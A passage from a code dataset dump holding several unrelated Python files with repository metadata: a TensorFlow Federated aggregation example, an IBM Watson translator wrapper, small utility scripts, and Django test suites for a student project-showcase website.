ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID("scellseg")
gui = scellsegGui()
app.setStyleSheet('\n'.join(sheet))
gui.show()
sys.exit(app.exec_())
if __name__ == "__main__":
start_gui() | 30.016529 | 116 | 0.499587 | 792 | 0.108851 | 0 | 0 | 0 | 0 | 0 | 0 | 2,978 | 0.409291 |
d336daa589d1898a53c01db9e10748817c7feeee | 4,066 | py | Python | tff_group_by_key_example/group_by_key_tff.py | michaeldtz/fed-dsp-examples | 781b4484242513152dcd1578470e1476b9490edf | [
"Apache-2.0"
] | null | null | null | tff_group_by_key_example/group_by_key_tff.py | michaeldtz/fed-dsp-examples | 781b4484242513152dcd1578470e1476b9490edf | [
"Apache-2.0"
] | null | null | null | tff_group_by_key_example/group_by_key_tff.py | michaeldtz/fed-dsp-examples | 781b4484242513152dcd1578470e1476b9490edf | [
"Apache-2.0"
] | 1 | 2022-02-25T11:25:30.000Z | 2022-02-25T11:25:30.000Z | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This is a simplest TFF program that performs a federated computation of sums.
# It defines a program that locally at the federated nodes computes a range, sums it
# and then created a federated sum across all participants.
#
#
import tensorflow as tf
import tensorflow_federated as tff
import numpy as np
import nest_asyncio
nest_asyncio.apply()
from collections import OrderedDict
from group_by_key_lib import gather_data, key_list_func
def run():
dataset = gather_data("1")
key_list = key_list_func(dataset)
key_list_t = [t.numpy() for t in key_list]
@tf.function
def count_by_key(ds):
key_size = len(key_list_t)
idx_list = tf.range(key_size, dtype=tf.int64)
key_lookup = tf.lookup.StaticHashTable(
tf.lookup.KeyValueTensorInitializer(key_list_t, idx_list),
default_value=-1)
@tf.function
def _count_keys(acummulator, values):
indices = key_lookup.lookup(values["KEY"])
onehot = tf.one_hot(indices, depth=tf.cast(key_size, tf.int32), dtype=tf.int32)
return acummulator + onehot
return ds.reduce(
initial_state=tf.zeros([key_size], tf.int32),
reduce_func=_count_keys)
@tff.federated_computation(tff.FederatedType(tf.string, tff.CLIENTS))
def federated_group_agg(id):
# wrap the used function into tff computations
tff_gather_data_func = tff.tf_computation(gather_data, tf.string)
# Derive the dataset type from the gather function
tff_dataset_type = tff_gather_data_func.type_signature.result # tff.SequenceType(OrderedDict([('TRANS_ID', tf.string), ('SEND_BIC', tf.int64), ('REC_BIC', tf.int64), ('KEY', tf.int64)]))
# continue to wrap functions
tff_count_by_key = tff.tf_computation(count_by_key, tff_dataset_type)
tff_key_list_func = tff.tf_computation(key_list_func, tff_dataset_type)
# print out type signature (for dev purposes)
print(tff_gather_data_func.type_signature)
print(tff_count_by_key.type_signature)
print(tff_key_list_func.type_signature)
# Get dataset on client side
tff_client_dataset = tff.federated_map(tff_gather_data_func, id)
# Calculate the aggregates per client
client_aggregates = tff.federated_map(tff_count_by_key, tff_client_dataset)
# Start to build the aggregation function
@tff.tf_computation()
def build_zeros():
key_size = len(key_list_t)
return tf.zeros([key_size], tf.int32)
@tff.tf_computation(build_zeros.type_signature.result,build_zeros.type_signature.result)
def accumulate(accum, delta):
return accum + delta
@tff.tf_computation(accumulate.type_signature.result)
def report(accum):
return tf.convert_to_tensor(key_list_t), accum
aggregate = tff.federated_aggregate(
value=client_aggregates,
zero=build_zeros(),
accumulate=accumulate,
merge=accumulate,
report=report,
)
# Second one to print out type signatures (for dev purposes)
print(build_zeros.type_signature) # ( -> int32[key_size])
print(accumulate.type_signature) # (<int32[key_size],int32[key_size]> -> int32[key_size])
print(report.type_signature) # (int32[key_size] -> <string[K],int32[]>)
print(aggregate.type_signature)
return aggregate
## Now execute the federated
result = federated_group_agg(["1","2"])
print(result)
if __name__ == "__main__":
print("Running this in federated mode" )
run()
| 33.327869 | 190 | 0.71938 | 0 | 0 | 0 | 0 | 2,719 | 0.668716 | 0 | 0 | 1,457 | 0.358337 |
d336f7daf1dfbab4fe94ce85a802bb39d23a2533 | 918 | py | Python | final_project/machinetranslation/translator.py | Opaso/xzceb-flask_eng_fr | 2aaa6e0efaefa618e7970470c4658cb26985bd5a | [
"Apache-2.0"
] | null | null | null | final_project/machinetranslation/translator.py | Opaso/xzceb-flask_eng_fr | 2aaa6e0efaefa618e7970470c4658cb26985bd5a | [
"Apache-2.0"
] | null | null | null | final_project/machinetranslation/translator.py | Opaso/xzceb-flask_eng_fr | 2aaa6e0efaefa618e7970470c4658cb26985bd5a | [
"Apache-2.0"
] | null | null | null | import os
from ibm_watson import LanguageTranslatorV3
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
from dotenv import load_dotenv
load_dotenv()
apikey= os.environ['apikey']
url= os.environ['url']
VERSION= '2018-05-01'
authenticator= IAMAuthenticator(apikey)
language_translator= LanguageTranslatorV3(version=VERSION, authenticator=authenticator)
language_translator.set_service_url(url)
def englishToFrench(english_text):
french_translation= language_translator.translate(text= english_text, model_id= 'en-fr')
result= french_translation.get_result()
french_text= result['translations'][0]['translation']
return french_text
def frenchToEnglish(french_text):
english_translation= language_translator.translate(text= french_text, model_id= 'fr-en')
result= english_translation.get_result()
english_text= result['translations'][0]['translation']
return english_text
| 34 | 92 | 0.8061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 93 | 0.101307 |
d33c83028d980eeb9f91ddf24085145d4792726e | 629 | py | Python | Malloc/run.py | Yanjun-Chen/Python-Tools | be3c9d3e2f2ac368c121805548c70757644e2302 | [
"MIT"
] | 1 | 2021-02-16T06:39:48.000Z | 2021-02-16T06:39:48.000Z | Malloc/run.py | Yanjun-Chen/Python-Tools | be3c9d3e2f2ac368c121805548c70757644e2302 | [
"MIT"
] | null | null | null | Malloc/run.py | Yanjun-Chen/Python-Tools | be3c9d3e2f2ac368c121805548c70757644e2302 | [
"MIT"
] | null | null | null | import trace_malloc as trace
'''trace 10 files with maximum memory allocated'''
trace.start()
# ... run your code ...
snapshot = trace.take_snapshot()
top_stats = snapshot.statistics('lineno')
print("[ Top 10 ]")
for stat in top_stats[:10]:
print(stat)
'''Backtrack the largest memory block'''
# Store 25 frames
trace.start(25)
# ... run your code ...
snapshot = trace.take_snapshot()
top_stats = snapshot.statistics('traceback')
# pick the biggest memory block
stat = top_stats[0]
print("%s memory blocks: %.1f KiB" % (stat.count, stat.size / 1024))
for line in stat.traceback.format():
print(line)
''' ''' | 17.971429 | 68 | 0.683625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 250 | 0.397456 |
d33d05aa2036a3db33dfe5549b91f4bc1ae6e12f | 770 | py | Python | test/visualization/test_visualize.py | wukathryn/axondeepseg | b5533f37d5337759fd0fd4186e286cb201b66c65 | [
"MIT"
] | 115 | 2017-11-08T02:24:31.000Z | 2022-02-10T19:03:57.000Z | test/visualization/test_visualize.py | wukathryn/axondeepseg | b5533f37d5337759fd0fd4186e286cb201b66c65 | [
"MIT"
] | 511 | 2017-12-05T15:23:09.000Z | 2022-02-22T19:38:43.000Z | test/visualization/test_visualize.py | wukathryn/axondeepseg | b5533f37d5337759fd0fd4186e286cb201b66c65 | [
"MIT"
] | 35 | 2017-11-30T13:36:28.000Z | 2022-01-10T18:11:06.000Z | # coding: utf-8
from pathlib import Path
import pytest
from AxonDeepSeg.visualization.visualize import visualize_training
class TestCore(object):
def setup(self):
# Get the directory where this current file is saved
self.fullPath = Path(__file__).resolve().parent
# Move up to the test directory, "test/"
self.testPath = self.fullPath.parent
self.pathModel = (
self.testPath /
'__test_files__' /
'__test_model__' /
'Model'
)
def teardown(self):
pass
# --------------visualize_training tests-------------- #
@pytest.mark.unit
def test_visualize_training_runs_successfully(self):
assert visualize_training(str(self.pathModel))
| 24.0625 | 66 | 0.615584 | 642 | 0.833766 | 0 | 0 | 130 | 0.168831 | 0 | 0 | 202 | 0.262338 |
d33de8c495b1c5d04c26434bb941307d1b085eba | 441 | py | Python | normal_forms/examples/normal_form/07.py | joepatmckenna/normal_forms | e506304295a2592cfc050a2a688add89715aa5ff | [
"MIT"
] | null | null | null | normal_forms/examples/normal_form/07.py | joepatmckenna/normal_forms | e506304295a2592cfc050a2a688add89715aa5ff | [
"MIT"
] | null | null | null | normal_forms/examples/normal_form/07.py | joepatmckenna/normal_forms | e506304295a2592cfc050a2a688add89715aa5ff | [
"MIT"
] | null | null | null | from normal_forms import normal_form
import sympy
# Murdock, Normal Forms and Unfoldings of Local Dynamical Systems, Example 4.5.24
def f(x, y, z):
f1 = 6 * x + x**2 + x * y + x * z + y**2 + y * z + z**2
f2 = 2 * y + x**2 + x * y + x * z + y**2 + y * z + z**2
f3 = 3 * z + x**2 + x * y + x * z + y**2 + y * z + z**2
return f1, f2, f3
h = normal_form(f, (0, 0, 0), 2)
# coeff of z**2
print h.fun[0].coeff(h.jet.var[2]**2)
| 27.5625 | 81 | 0.512472 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 96 | 0.217687 |
d33e1e636ee5da0369711e6dc257901496e19cc2 | 486 | py | Python | julie/physics/velocity.py | MarcelloBB/julieutils | cffba53a1561d05660c2274ce0a9485bf9e0ddcf | [
"MIT"
] | 2 | 2021-08-23T15:16:43.000Z | 2021-11-01T15:29:02.000Z | julie/physics/velocity.py | MarcelloBB/julieutils | cffba53a1561d05660c2274ce0a9485bf9e0ddcf | [
"MIT"
] | null | null | null | julie/physics/velocity.py | MarcelloBB/julieutils | cffba53a1561d05660c2274ce0a9485bf9e0ddcf | [
"MIT"
] | null | null | null |
def average_speed(s1 : float, s0 : float, t1 : float, t0 : float) -> float:
"""
[FUNC] average_speed:
Returns the average speed.
Where:
Delta Space = (space1[s1] - space0[s0])
Delta Time = (time1[t1] - time0[t0])
"""
return ((s1-s0)/(t1-t0));
def average_acceleration(v1 : float, v0 : float, t1 : float, t0 : float) -> float:
"""
[FUNC] average_acceleration:
Returns the average_acceleration
"""
return ((v1-v0)/(t1-t0)); | 22.090909 | 82 | 0.576132 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 253 | 0.520576 |
d343f65dbd887e6c6ed96fa7058357629d64dfee | 28,858 | py | Python | projects/tests.py | DoubleCapitals/web-platform-prototype | b17a982d6e5d2231c9bc1127fe9f823ed546f36d | [
"MIT"
] | 3 | 2019-02-27T18:11:11.000Z | 2019-03-28T09:42:23.000Z | projects/tests.py | DoubleCapitals/web-platform-prototype | b17a982d6e5d2231c9bc1127fe9f823ed546f36d | [
"MIT"
] | 7 | 2019-02-28T06:29:50.000Z | 2019-04-26T05:46:41.000Z | projects/tests.py | DoubleCapitals/web-platform-prototype | b17a982d6e5d2231c9bc1127fe9f823ed546f36d | [
"MIT"
] | 5 | 2019-02-27T17:28:34.000Z | 2019-03-01T02:34:44.000Z | from django.test import TestCase, Client
from django.urls import reverse
from django.test.utils import setup_test_environment
from bs4 import BeautifulSoup
import re
import time
from projects.models import *
from projects.forms import *
client = Client()
# length of base template, used to test for empty pages
LEN_BASE = 2600
class BaseWebsiteTestCase(TestCase):
def setUp(self):
super()
def test_homepage_load(self):
url = reverse("projects:home")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_homepage_not_empty(self):
url = reverse("projects:home")
response = self.client.get(url)
self.assertGreater(len(response.content), LEN_BASE)
def test_project_list_load(self):
url = reverse("projects:projects_list")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_project_list_not_empty(self):
url = reverse("projects:projects_list")
response = self.client.get(url)
self.assertGreater(len(response.content), LEN_BASE)
def test_project_students_load(self):
url = reverse("projects:students")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_project_students_not_empty(self):
url = reverse("projects:students")
response = self.client.get(url)
self.assertGreater(len(response.content), LEN_BASE)
def test_project_educators_load(self):
url = reverse("projects:educators")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_project_educators_not_empty(self):
url = reverse("projects:educators")
response = self.client.get(url)
self.assertGreater(len(response.content), LEN_BASE)
def test_project_leaders_load(self):
url = reverse("projects:leaders")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_project_leaders_not_empty(self):
url = reverse("projects:leaders")
response = self.client.get(url)
self.assertGreater(len(response.content), LEN_BASE)
VERBOSE = False
class TraverseLinksTest(TestCase):
def setUp(self):
# By default, login as superuser
um = OpenSUTDUserManager()
um.create_user("tom", display_name="Tom Magnanti",
display_picture="https://via.placeholder.com/150",
graduation_year=2018, pillar="ISTD",
password="tompassword")
self.client = Client()
self.superuser = User.objects.get(username="tom")
self.client.login(username="tom", password="tompassword")
@classmethod
def setUpTestData(cls):
pm = OpenSUTDProjectManager()
um = OpenSUTDUserManager()
pm.create_project(project_uid="ACAD_00001",
title="OpenSUTD Web Platform",
caption="Sample project 1",
category="ACAD",
url="https://github.com/OpenSUTD/web-platform-prototype",
poster_url="https://via.placeholder.com/150",
featured_image="https://via.placeholder.com/150")
um.create_user("dick", display_name="Dick Tan",
display_picture="https://via.placeholder.com/150",
graduation_year=2019, pillar="ISTD")
um.create_user("jane", display_name="Jane Tan",
display_picture="https://via.placeholder.com/150",
graduation_year=2021, pillar="ESD")
pm.create_project(project_uid="ACAD_00002",
title="RandomZZZZZ",
caption="Sample project 2",
category="ACAD",
url="https://github.com/OpenSUTD/web-platform-prototype",
poster_url="https://via.placeholder.com/150",
featured_image="https://via.placeholder.com/150")
pm.set_project_status("ACAD_00001", "ACCEPT")
pm.add_user_to_project("ACAD_00001", "dick")
pm.add_user_to_project("ACAD_00001", "jane")
pm.add_tag_to_project(
"ACAD_00001", "rand1,rand2,education,student,policy")
pm.add_user_to_project("ACAD_00002", "jane")
pm.add_tag_to_project(
"ACAD_00002", "rand1,rand2,education,student,policy")
def test_traverse_urls(self):
# Fill these lists as needed with your site specific URLs to check and to avoid
to_traverse_list = ["/", "/projects/",
"/students/", "/educators/", "/leaders/"]
to_avoid_list = ["javascript:history\.back()", "https://*",
"javascript:history\.go\(-1\)", "^mailto:.*"]
done_list = []
error_list = []
source_of_link = dict()
for link in to_traverse_list:
source_of_link[link] = "initial"
(to_traverse_list, to_avoid_list, done_list, error_list, source_of_link) = \
self.recurse_into_path(
to_traverse_list, to_avoid_list, done_list, error_list, source_of_link)
print("END REACHED\nStats:")
if VERBOSE:
print("\nto_traverse_list = " + str(to_traverse_list))
if VERBOSE:
print("\nto_avoid_list = " + str(to_avoid_list))
if VERBOSE:
print("\nsource_of_link = " + str(source_of_link))
if VERBOSE:
print("\ndone_list = " + str(done_list))
print("Followed " + str(len(done_list)) + " links successfully")
print("Avoided " + str(len(to_avoid_list)) + " links")
if error_list:
print("!! " + str(len(error_list)) + " error(s) : ")
for error in error_list:
print(str(error) + " found in page " +
source_of_link[error[0]])
print("Errors found traversing links")
assert False
else:
print("No errors")
def recurse_into_path(self, to_traverse_list, to_avoid_list, done_list, error_list, source_of_link):
""" Dives into first item of to_traverse_list
Returns: (to_traverse_list, to_avoid_list, done_list, source_of_link)
"""
if to_traverse_list:
url = to_traverse_list.pop()
if not match_any(url, to_avoid_list):
print("\nSurfing to " + str(url) +
", discovered in " + str(source_of_link[url]))
response = self.client.get(url, follow=True)
if response.status_code == 200:
soup = BeautifulSoup(response.content, "html.parser")
text = soup.get_text()
for link in soup.find_all("a"):
new_link = link.get("href")
if VERBOSE:
print(" Found link: " + str(new_link))
if match_any(new_link, to_avoid_list):
if VERBOSE:
print(" Avoiding it")
elif new_link in done_list:
if VERBOSE:
print(" Already done, ignoring")
elif new_link in to_traverse_list:
if VERBOSE:
print(" Already in to traverse list, ignoring")
else:
if VERBOSE:
print(
" New, unknown link: Storing it to traverse later")
source_of_link[new_link] = url
to_traverse_list.append(new_link)
done_list.append(url)
if VERBOSE:
print("Done")
else:
error_list.append((url, response.status_code))
to_avoid_list.append(url)
if VERBOSE:
print("Diving into next level")
return self.recurse_into_path(to_traverse_list, to_avoid_list, done_list, error_list, source_of_link)
else:
# Nothing to traverse
if VERBOSE:
print("Returning to upper level")
return to_traverse_list, to_avoid_list, done_list, error_list, source_of_link
def match_any(my_string, regexp_list):
if my_string:
combined = "(" + ")|(".join(regexp_list) + ")"
return re.match(combined, my_string)
else:
# "None" as string always matches
return True
class SecuredPageTestCase(TestCase):
def setUp(self):
pm = OpenSUTDProjectManager()
pm.create_project(project_uid="ACAD_00001",
title="OpenSUTD Web Platform",
caption="Sample project 1",
category="ACAD",
url="https://github.com/OpenSUTD/web-platform-prototype",
poster_url="https://via.placeholder.com/150",
featured_image="https://via.placeholder.com/150")
um = OpenSUTDUserManager()
um.create_user("tom", display_name="Tom Magnanti",
display_picture="https://via.placeholder.com/150",
graduation_year=2018, pillar="ISTD")
def test_auth_approval_view(self):
url = reverse("projects:approval")
response = self.client.get(url)
self.assertEqual(response.status_code, 302)
def test_auth_submit_view(self):
url = reverse("projects:submit_new")
response = self.client.get(url)
self.assertEqual(response.status_code, 302)
def test_auth_submit_reject(self):
url = reverse("projects:reject", args=("ACAD_00001",))
response = self.client.get(url)
self.assertEqual(response.status_code, 302)
def test_auth_submit_approve(self):
url = reverse("projects:approve", args=("ACAD_00001",))
response = self.client.get(url)
self.assertEqual(response.status_code, 302)
def test_auth_user_edit(self):
url = reverse("projects:user_edit", args=("tom",))
response = self.client.get(url)
self.assertEqual(response.status_code, 302)
def test_auth_project_edit(self):
url = reverse("projects:project_edit", args=("ACAD_00001",))
response = self.client.get(url)
self.assertEqual(response.status_code, 302)
def test_auth_project_bypass(self):
url = reverse("projects:project_page_bypass", args=("ACAD_00001",))
response = self.client.get(url)
# actually a custom 404 page
self.assertEqual(response.status_code, 200)
class SubmissionFormTest(TestCase):
def setUp(self):
self.client = Client()
um = OpenSUTDUserManager()
um.create_user("tom", display_name="Tom Magnanti",
display_picture="https://via.placeholder.com/150",
graduation_year=2018, pillar="ISTD",
password="tompassword")
self.client.login(username="tom", password="tompassword")
def test_submission_form_entry(self):
response = self.client.get(reverse("projects:submit_new"))
self.assertEqual(response.status_code, 200)
# test submission mechanism
form = SubmissionForm({"project_name": "test",
"caption": "test caption",
"category": "ACAD",
"featured_image": "http://pluspng.com/img-png/user-png-icon-male-user-icon-512.png",
"github_url": "https://github.com/OpenSUTD/web-platform-prototype",
"poster_url": "http://pluspng.com/img-png/user-png-icon-male-user-icon-512.png"})
self.assertEqual(form.is_valid(), True)
def test_submission_form_entry_invalid(self):
response = self.client.get(reverse("projects:submit_new"))
self.assertEqual(response.status_code, 200)
# test submission mechanism
form = SubmissionForm({"project_name": "",
"caption": "",
"category": "",
"featured_image": "",
"github_url": "",
"poster_url": ""})
self.assertEqual(form.is_valid(), False)
def test_submission_form_entry_not_github(self):
response = self.client.get(reverse("projects:submit_new"))
self.assertEqual(response.status_code, 200)
# test submission mechanism
form = SubmissionForm({"project_name": "test",
"caption": "test caption",
"category": "ACAD",
"featured_image": "http://pluspng.com/img-png/user-png-icon-male-user-icon-512.png",
"github_url": "https://lolcats.com/OpenSUTD/web-platform-prototype",
"poster_url": "http://pluspng.com/img-png/user-png-icon-male-user-icon-512.png"})
self.assertEqual(form.is_valid(), False)
class UserProfileFormTest(TestCase):
def setUp(self):
self.client = Client()
um = OpenSUTDUserManager()
um.create_user("tom", display_name="Tom Magnanti",
display_picture="https://via.placeholder.com/150",
graduation_year=2018, pillar="ISTD",
password="tompassword")
self.client.login(username="tom", password="tompassword")
def test_submission_form_entry(self):
# test user can actually get to the page
response = self.client.get(
reverse("projects:user_edit", args=("tom",)))
self.assertEqual(response.status_code, 200)
# test submission mechanism
form = UserProfileForm({"display_name": "tom2",
"display_picture": "http://pluspng.com/img-png/user-png-icon-male-user-icon-512.png",
"graduation_year": 2019,
"pillar": "ISTD",
"bio": "Hi I am Tom",
"contact_email": "tlkh.xms@gmail.com",
"personal_links": "tlkh.design"})
self.assertEqual(form.is_valid(), True)
def test_submission_form_entry_invalid(self):
# test user can actually get to the page
response = self.client.get(
reverse("projects:user_edit", args=("tom",)))
self.assertEqual(response.status_code, 200)
# test submission mechanism
form = UserProfileForm({"display_name": "",
"display_picture": "",
"graduation_year": 2019,
"pillar": "",
"bio": "",
"contact_email": "",
"personal_links": ""})
self.assertEqual(form.is_valid(), False)
class ProjectEditFormTest(TestCase):
def setUp(self):
self.client = Client()
um = OpenSUTDUserManager()
um.create_user("tom", display_name="Tom Magnanti",
display_picture="https://via.placeholder.com/150",
graduation_year=2018, pillar="ISTD",
password="tompassword")
pm = OpenSUTDProjectManager()
pm.create_project(project_uid="ACAD_00001",
title="OpenSUTD Web Platform",
caption="Sample project 1",
category="ACAD",
url="https://github.com/OpenSUTD/web-platform-prototype",
poster_url="https://via.placeholder.com/150",
featured_image="https://via.placeholder.com/150")
pm.set_project_status("ACAD_00001", "ACCEPT")
self.client.login(username="tom", password="tompassword")
def test_submission_form_entry_invalid(self):
# test user can actually get to the page
response = self.client.get(
reverse("projects:project_edit", args=("ACAD_00001",)))
self.assertEqual(response.status_code, 200)
# test submission mechanism
form = ProjectEditForm({"title": "",
"caption": "",
"featured_image": "",
"url": "",
"poster_url": ""})
self.assertEqual(form.is_valid(), False)
def test_submission_form_entry(self):
# test user can actually get to the page
response = self.client.get(
reverse("projects:project_edit", args=("ACAD_00001",)))
self.assertEqual(response.status_code, 200)
# test submission mechanism
form = ProjectEditForm({"title": "lalalal",
"caption": "lalalal",
"featured_image": "lalalal.com",
"url": "https://github.com/OpenSUTD/web-platform-prototype",
"poster_url": "lalalal.com"})
self.assertEqual(form.is_valid(), True)
class LogintoSecuredPageTestCase(TestCase):
def setUp(self):
self.client = Client()
um = OpenSUTDUserManager()
um.create_user("tom", display_name="Tom Magnanti",
display_picture="https://via.placeholder.com/150",
graduation_year=2018, pillar="ISTD",
password="tompassword")
pm = OpenSUTDProjectManager()
pm.create_project(project_uid="ACAD_00001",
title="OpenSUTD Web Platform",
caption="Sample project 1",
category="ACAD",
url="https://github.com/OpenSUTD/web-platform-prototype",
poster_url="https://via.placeholder.com/150",
featured_image="https://via.placeholder.com/150")
self.client.login(username="tom", password="tompassword")
def test_login_approval_view(self):
response = self.client.get(reverse("projects:approval"))
self.assertEqual(response.status_code, 200)
def test_login_submission_view(self):
response = self.client.get(reverse("projects:submit_new"))
self.assertEqual(response.status_code, 200)
def test_login_user_edit(self):
url = reverse("projects:user_edit", args=("tom",))
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_login_project_edit(self):
pm = OpenSUTDProjectManager()
pm.set_project_status("ACAD_00001", "ACCEPT")
url = reverse("projects:project_edit", args=("ACAD_00001",))
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
class UserTestCase(TestCase):
def setUp(self):
um = OpenSUTDUserManager()
um.create_user("tom", display_name="Tom Magnanti",
display_picture="https://via.placeholder.com/150",
graduation_year=2018, pillar="ISTD")
um.create_user("jane", display_name="Jane Tan",
display_picture="https://via.placeholder.com/150",
graduation_year=2021, pillar="ESD")
def test_user_get_name(self):
tom = User.objects.get(username="tom")
self.assertEqual(tom.display_name, "Tom Magnanti")
jane = User.objects.get(username="jane")
self.assertEqual(jane.display_name, "Jane Tan")
def test_user_get_year(self):
tom = User.objects.get(username="tom")
self.assertEqual(tom.graduation_year, 2018)
jane = User.objects.get(username="jane")
self.assertEqual(jane.graduation_year, 2021)
def test_user_get_pillar(self):
tom = User.objects.get(username="tom")
self.assertEqual(tom.pillar, "ISTD")
jane = User.objects.get(username="jane")
self.assertEqual(jane.pillar, "ESD")
# test user profile page contents
def test_user_page_load(self):
url = reverse("projects:user", args=("tom",))
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
url = reverse("projects:user", args=("jane",))
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_user_page_not_empty(self):
url = reverse("projects:user", args=("tom",))
response = self.client.get(url)
self.assertGreater(len(response.content), LEN_BASE)
url = reverse("projects:user", args=("jane",))
response = self.client.get(url)
self.assertGreater(len(response.content), LEN_BASE)
def test_user_page_name(self):
url = reverse("projects:user", args=("tom",))
response = str(self.client.get(url).content)
self.assertEqual("Tom Magnanti" in response, True)
url = reverse("projects:user", args=("jane",))
response = str(self.client.get(url).content)
self.assertEqual("Jane Tan" in response, True)
def test_user_page_year(self):
url = reverse("projects:user", args=("tom",))
response = str(self.client.get(url).content)
self.assertEqual("2018" in response, True)
url = reverse("projects:user", args=("jane",))
response = str(self.client.get(url).content)
self.assertEqual("2021" in response, True)
def test_user_page_pillar(self):
url = reverse("projects:user", args=("tom",))
response = str(self.client.get(url).content)
self.assertEqual("ISTD" in response, True)
url = reverse("projects:user", args=("jane",))
response = str(self.client.get(url).content)
self.assertEqual("ESD" in response, True)
def test_user_page_performance(self):
start = time.time()
for i in range(10):
url = reverse("projects:user", args=("tom",))
response = self.client.get(url)
url = reverse("projects:user", args=("jane",))
response = self.client.get(url)
duration = time.time() - start
self.assertLess(duration, 1.5)
class ProjectShowcaseTestCase(TestCase):
def setUp(self):
pm = OpenSUTDProjectManager()
pm.create_project(project_uid="ACAD_00001",
title="OpenSUTD Web Platform",
caption="Sample project 1",
category="ACAD",
url="https://github.com/OpenSUTD/web-platform-prototype",
poster_url="https://via.placeholder.com/150",
featured_image="https://via.placeholder.com/150")
um = OpenSUTDUserManager()
um.create_user("tom", display_name="Tom Magnanti",
display_picture="https://via.placeholder.com/150",
graduation_year=2018, pillar="ISTD")
um.create_user("jane", display_name="Jane Tan",
display_picture="https://via.placeholder.com/150",
graduation_year=2021, pillar="ESD")
def test_project_properties(self):
proj = Project.objects.get(project_uid="ACAD_00001")
self.assertEqual(proj.title, "OpenSUTD Web Platform")
def test_add_user_project(self):
pm = OpenSUTDProjectManager()
pm.add_user_to_project("ACAD_00001", "tom")
proj = Project.objects.get(project_uid="ACAD_00001")
self.assertEqual(len(proj.users.all()), 1)
pm.add_user_to_project("ACAD_00001", "jane")
self.assertEqual(len(proj.users.all()), 2)
def test_add_tag_project(self):
pm = OpenSUTDProjectManager()
pm.add_tag_to_project("ACAD_00001", "rand1,rand2")
proj = Project.objects.get(project_uid="ACAD_00001")
self.assertEqual(len(proj.tags.all()), 2)
def test_add_del_user_project(self):
tom = User.objects.get(username="tom")
jane = User.objects.get(username="jane")
proj = Project.objects.get(project_uid="ACAD_00001")
proj.users.add(tom)
proj.users.add(jane)
proj.users.remove(jane)
self.assertEqual(len(proj.users.all()), 1)
def test_project_page_not_approved(self):
pm = OpenSUTDProjectManager()
pm.set_project_status("ACAD_00001", "REJECT")
url = reverse("projects:project_page", args=("ACAD_00001",))
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual("Error 404: Page Not Found!" in str(
response.content), True)
self.assertGreater(len(response.content), LEN_BASE)
def test_project_page_approved(self):
pm = OpenSUTDProjectManager()
pm.set_project_status("ACAD_00001", "ACCEPT")
url = reverse("projects:project_page", args=("ACAD_00001",))
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertGreater(len(response.content), LEN_BASE)
def test_project_page_name(self):
pm = OpenSUTDProjectManager()
pm.set_project_status("ACAD_00001", "ACCEPT")
url = reverse("projects:project_page", args=("ACAD_00001",))
response = str(self.client.get(url).content)
self.assertEqual("OpenSUTD Web Platform" in response, True)
def test_project_tag(self):
pm = OpenSUTDProjectManager()
pm.set_project_status("ACAD_00001", "ACCEPT")
pm.add_tag_to_project("ACAD_00001", "tag1,tag2")
url = reverse("projects:project_page", args=("ACAD_00001",))
response = str(self.client.get(url).content)
self.assertEqual("tag1" in response, True)
self.assertEqual("tag2" in response, True)
def test_project_page_contents(self):
pm = OpenSUTDProjectManager()
pm.set_project_status("ACAD_00001", "ACCEPT")
url = reverse("projects:project_page", args=("ACAD_00001",))
response = str(self.client.get(url).content)
# print(response)
# test top and bottom of contents
# this does not pass on Travis for Pull Request builds
# due to them disabling env variables for security reasons
#self.assertEqual("Prototype for the Eventual OpenSUTD Web Platform" in response, True)
#self.assertEqual("Data Model" in response, True)
self.assertGreater(len(response), LEN_BASE)
def test_project_page_load(self):
pm = OpenSUTDProjectManager()
pm.set_project_status("ACAD_00001", "ACCEPT")
url = reverse("projects:project_page", args=("ACAD_00001",))
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_project_page_not_empty(self):
pm = OpenSUTDProjectManager()
pm.set_project_status("ACAD_00001", "ACCEPT")
url = reverse("projects:project_page", args=("ACAD_00001",))
response = str(self.client.get(url).content)
self.assertGreater(len(response), LEN_BASE)
def test_project_author_name(self):
pm = OpenSUTDProjectManager()
pm.set_project_status("ACAD_00001", "ACCEPT")
pm.add_user_to_project("ACAD_00001", "tom")
url = reverse("projects:project_page", args=("ACAD_00001",))
response = str(self.client.get(url).content)
self.assertEqual("Tom Magnanti" in response, True)
def test_project_author_pillar(self):
pm = OpenSUTDProjectManager()
pm.set_project_status("ACAD_00001", "ACCEPT")
pm.add_user_to_project("ACAD_00001", "tom")
url = reverse("projects:project_page", args=("ACAD_00001",))
response = str(self.client.get(url).content)
self.assertEqual("ISTD" in response, True)
def test_project_list_page(self):
pm = OpenSUTDProjectManager()
pm.set_project_status("ACAD_00001", "ACCEPT")
url = reverse("projects:projects_list")
response = str(self.client.get(url).content)
self.assertEqual("OpenSUTD Web Platform" in response, True)
self.assertEqual("Sample project 1" in response, True)
def test_project_page_performance(self):
start = time.time()
for _ in range(10):
url = reverse("projects:project_page", args=("ACAD_00001",))
response = self.client.get(url)
duration = time.time() - start
self.assertLess(duration, 1.5)
| 40.530899 | 117 | 0.585557 | 28,251 | 0.978966 | 0 | 0 | 1,771 | 0.061369 | 0 | 0 | 6,928 | 0.240072 |
